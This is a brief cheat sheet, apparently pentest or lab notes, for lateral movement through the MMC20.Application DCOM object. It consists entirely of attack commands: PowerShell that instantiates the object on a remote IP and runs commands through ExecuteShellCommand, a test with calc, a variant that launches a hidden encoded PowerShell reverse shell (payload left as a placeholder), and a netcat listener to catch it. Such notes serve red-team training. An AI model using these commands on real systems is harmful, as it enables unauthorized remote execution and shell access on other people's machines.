DCOM Lateral Movement (MMC20.Application)
Instantiate remote DCOM object
$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","192.168.50.73"))
Run a command remotely
$dcom.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c calc","7")
Verify
tasklist | findstr "calc"
Encoded PowerShell reverse shell variant
$dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"powershell -nop -w hidden -e <BASE64>","7")
Listener:
nc -lnvp 443